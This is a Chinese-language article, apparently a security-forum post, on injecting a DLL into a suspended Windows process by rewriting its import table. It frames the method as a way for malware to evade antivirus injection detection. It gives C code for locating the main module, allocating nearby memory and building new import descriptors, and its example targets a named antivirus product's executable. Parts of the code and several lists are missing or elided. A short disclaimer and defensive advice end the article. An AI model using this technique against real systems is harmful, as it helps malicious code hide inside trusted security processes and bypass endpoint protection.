利用安全软件的白名单进程进行敏感操作，是恶意软件的常见特征。在现代安全软件中，常会通过复杂的权限校验严格限制目标进程的权限。但一些安全软件在防止APC注入时只防止通过OpenProcess获取进程句柄，或者对通过进程句柄继承的句柄限制不严格，导致产生一些问题。本文介绍一种基于导入表劫持的DLL注入技术，该技术通过修改挂起进程的导入表，使目标进程在启动时自动加载恶意DLL，从而绕过常见的注入检测手段。

常见的进程注入方式包括：

其中，APC注入和远程线程注入是安全软件重点监控的对象，通常会检查OpenProcess获取的句柄权限以及CreateRemoteThread调用。而导入表劫持技术不需要在目标进程中创建远程线程，仅需对挂起进程的内存进行修改，且修改操作可通过继承的进程句柄完成，从而规避某些仅对OpenProcess返回的句柄做严格权限检查的安全软件。

在Windows中，父进程创建子进程时可以设置bInheritHandles = TRUE，使得子进程继承父进程的可继承句柄。但本技术的核心在于：创建挂起进程后，直接使用CreateProcess返回的进程句柄（pi.hProcess）进行操作。该句柄拥有足够的权限（PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_SUSPEND_RESUME等），因为它是创建者自然获得的。许多安全软件在挂钩OpenProcess时只拦截外部进程打开目标进程的行为，而对于通过CreateProcess直接获得的句柄（属于进程创建的自然流程）往往不做严格限制，或者因为性能原因忽略了对该句柄的后续操作检查。

此外，通过继承机制，恶意代码可以预先创建一个高权限的子进程，然后让子进程继承某些敏感句柄，进一步绕过基于进程身份的访问检查。

要验证一个进程句柄是否具备所需的操作权限，可以使用GetHandleInformation或NtQueryObject。在注入前，代码可以检查PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD等权限。本例中的CreateProcessAndInjectDll函数直接假定返回的句柄具有足够权限，因为它是合法创建的挂起进程。

下面提供的代码实现了通过修改挂起进程的导入表来注入DLL。其核心流程如下：

该技术的优点：

局限性：

下面逐段解释提供的C代码。

确保编译为64位，因为代码中使用了IMAGE_NT_HEADERS64等64位结构。

安全的32位整数加法和乘法，防止溢出。

该函数通过遍历目标进程的内存区域，寻找符合PE格式且不是DLL的模块，即主可执行文件。它检查DOS签名、NT签名、机器类型（AMD64），并确认不是DLL，返回基址。

此函数在目标进程的指定基址（pbBase）附近查找空闲内存区域，并以64KB粒度尝试分配。目的是使新分配的导入表地址与主模块基址的偏移量不超过32位有符号范围（2GB），以便在PE头中使用32位RVA。如果分配的内存太远，则加载器可能无法正确解析。

参数类似CreateProcess，额外增加lpDllName指定要注入的DLL路径（ANSI字符串）。

强制添加CREATE_SUSPENDED标志，使主线程挂起，便于修改内存。

绑定导入表会预先计算函数地址，如果存在可能会干扰新添加的导入项，因此清空。

保留原有导入表，以便在后面合并时拷贝。

代码中每个DLL预留了4个IMAGE_THUNK_DATA64条目，其中两个用于导入名称表（INT），两个用于导入地址表（IAT）。

pbBase是一个启发式的起始地址，通常在代码段、数据段之后，试图在靠近主模块的地方分配内存。

这里构造的导入描述符使用了序号导入（IMAGE_ORDINAL_FLAG64 | 1），这意味着它要求目标DLL导出序号为1的函数。实际中，为了确保DLL被加载但不一定要调用某个函数，可以改为按名字导入一个存在的函数（如DllMain），或者利用延迟加载机制。

obStr是写入的总长度。

由于我们总是添加了CREATE_SUSPENDED，所以这里恢复线程。进程开始运行，加载器会解析新的导入表，加载指定的DLL。

该示例启动C:\Program Files\Huorong\Sysdiag\bin\HipsMain.exe，向其注入a64.dll，然后等待HipsDaemon.exe进程结束。

许多安全软件对进程注入的监控点包括：

本技术的特点：

当然，高级安全软件会监控VirtualAllocEx、WriteProcessMemory、VirtualProtectEx以及PE头的完整性。但通过精心选择目标进程（如白名单程序），并在合法上下文中操作，仍可能绕过部分防御。

本文展示了一种基于导入表劫持的DLL注入技术，通过创建挂起进程并修改其导入表，实现隐蔽的DLL加载。该技术绕过了依赖OpenProcess和远程线程检测的传统安全机制，但也需要目标进程可写且未受严格保护。在实际对抗中，防御方应加强对WriteProcessMemory和PE头修改的行为监控，同时检测异常的导入表变化。对于开发者，应避免使用CREATE_SUSPENDED启动关键进程，或启用进程完整性验证（如Protected Process Light）。

源码：附件中的TestOne.zip

免责声明：本文提供的代码仅用于安全研究和教育目的，请勿用于非法活动。

// 示例：检查句柄是否具有 VM 操作权限
DWORD access = 0;
if (GetHandleInformation(hProcess, &access)) {
    // 实际权限检查需要使用 NtQueryInformationProcess
}

#ifndef _WIN64
#error This implementation requires 64-bit compilation.
#endif

#define MM_ALLOCATION_GRANULARITY 0x10000

static inline DWORD PadToDword(DWORD dw) {
    return (dw + 3) & ~3u;
}

static inline DWORD PadToDwordPtr(DWORD dw) {
    return (dw + 7) & ~7u;
}

static HRESULT DWordAdd(DWORD a, DWORD b, DWORD* pResult) {
    ULONGLONG ull = (ULONGLONG)a + b;
    if (ull > 0xFFFFFFFF) return E_FAIL;
    *pResult = (DWORD)ull;
    return S_OK;
}

static HRESULT DWordMult(DWORD a, DWORD b, DWORD* pResult) {
    ULONGLONG ull = (ULONGLONG)a * b;
    if (ull > 0xFFFFFFFF) return E_FAIL;
    *pResult = (DWORD)ull;
    return S_OK;
}

static HMODULE FindMainModuleInProcess(HANDLE hProcess) {
    PBYTE pbLast = 0;
    MEMORY_BASIC_INFORMATION mbi;

    while (VirtualQueryEx(hProcess, (PVOID)pbLast, &mbi, sizeof(mbi)) != 0) {
        // 跳过无效区域
        if ((mbi.RegionSize & 0xfff) == 0xfff) break;
        if ((PBYTE)mbi.BaseAddress + mbi.RegionSize < pbLast) break;

        if (mbi.State != MEM_COMMIT ||
            (mbi.Protect & (PAGE_NOACCESS | PAGE_GUARD)) != 0) {
            pbLast = (PBYTE)mbi.BaseAddress + mbi.RegionSize;
            continue;
        }

        IMAGE_DOS_HEADER idh;
        if (!ReadProcessMemory(hProcess, mbi.BaseAddress, &idh, sizeof(idh), NULL))
            goto next;

        if (idh.e_magic != IMAGE_DOS_SIGNATURE)
            goto next;

        IMAGE_NT_HEADERS32 inh32;
        if (!ReadProcessMemory(hProcess, (PBYTE)mbi.BaseAddress + idh.e_lfanew,
            &inh32, sizeof(inh32), NULL))
            goto next;

        if (inh32.Signature != IMAGE_NT_SIGNATURE)
            goto next;

        if (inh32.FileHeader.Machine != IMAGE_FILE_MACHINE_AMD64)
            goto next;

        IMAGE_NT_HEADERS64 inh64;
        if (!ReadProcessMemory(hProcess, (PBYTE)mbi.BaseAddress + idh.e_lfanew,
            &inh64, sizeof(inh64), NULL))
            goto next;

        // 如果不是DLL，则认为是主模块（EXE）
        if (!(inh64.FileHeader.Characteristics & IMAGE_FILE_DLL))
            return (HMODULE)mbi.BaseAddress;

    next:
        pbLast = (PBYTE)mbi.BaseAddress + mbi.RegionSize;
    }
    return NULL;
}

static PBYTE FindAndAllocateNearBase(HANDLE hProcess,
    PBYTE pbModule,
    PBYTE pbBase,
    DWORD cbAlloc)
{
    MEMORY_BASIC_INFORMATION mbi;
    PBYTE pbLast = pbBase;

    for (;; pbLast = (PBYTE)mbi.BaseAddress + mbi.RegionSize) {
        ZeroMemory(&mbi, sizeof(mbi));
        if (VirtualQueryEx(hProcess, (PVOID)pbLast, &mbi, sizeof(mbi)) == 0) {
            if (GetLastError() == ERROR_INVALID_PARAMETER) break;
            break;
        }

        if ((mbi.RegionSize & 0xfff) == 0xfff) break;
        if (mbi.State != MEM_FREE) continue;

        PBYTE pbAddress = (PBYTE)mbi.BaseAddress > pbBase ? (PBYTE)mbi.BaseAddress : pbBase;
        const DWORD_PTR granularity = MM_ALLOCATION_GRANULARITY - 1;
        pbAddress = (PBYTE)(((DWORD_PTR)pbAddress + granularity) & ~granularity);

        // 检查分配后地址是否在 2GB 范围内（相对于主模块）
        if ((size_t)(pbAddress + cbAlloc - 1 - pbModule) > 0xFFFFFFFF)
            return NULL;

        for (; pbAddress < (PBYTE)mbi.BaseAddress + mbi.RegionSize;
            pbAddress += MM_ALLOCATION_GRANULARITY) {
            PBYTE pbAlloc = (PBYTE)VirtualAllocEx(hProcess, pbAddress, cbAlloc,
                MEM_RESERVE | MEM_COMMIT,
                PAGE_READWRITE);
            if (pbAlloc != NULL)
                return pbAlloc;
        }
    }
    return NULL;
}

BOOL CreateProcessAndInjectDll(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation,
    LPCSTR lpDllName)

if (!CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes,
    lpThreadAttributes, bInheritHandles, dwCreationFlags | CREATE_SUSPENDED,
    lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation))
    return FALSE;

HMODULE hModule = FindMainModuleInProcess(hProcess);
if (hModule == NULL) goto fail;

// 读取 DOS 头和 NT 头
// ...
// 清除绑定导入表，避免冲突
inh.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
inh.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;

DWORD oldImportRVA = inh.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
DWORD oldImportSize = inh.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size;
if (oldImportRVA != 0) {
    // 如果 Size 为 0，则通过遍历描述符计算实际大小
    // 读取原有导入描述符数组到 pOldImportDesc
}

DWORD nDlls = 1;  // 注入一个 DLL
// 计算所需总字节数：新导入描述符 + 旧导入描述符 + IAT + DLL名字符串
// obRem = 新描述符大小 (sizeof(IMAGE_IMPORT_DESCRIPTOR) * nDlls)
// obOld = obRem + 旧描述符大小
// obTab = 对齐到8字节
// stSize = IAT大小 (每个DLL需要4个IMAGE_THUNK_DATA64，两个用于INT，两个用于IAT)
// obDll = obTab + stSize
// obStr = obDll
// cbNew = obStr + DLL名字符串长度（对齐后）

传播安全知识、拓宽行业人脉——看雪讲师团队等你加入！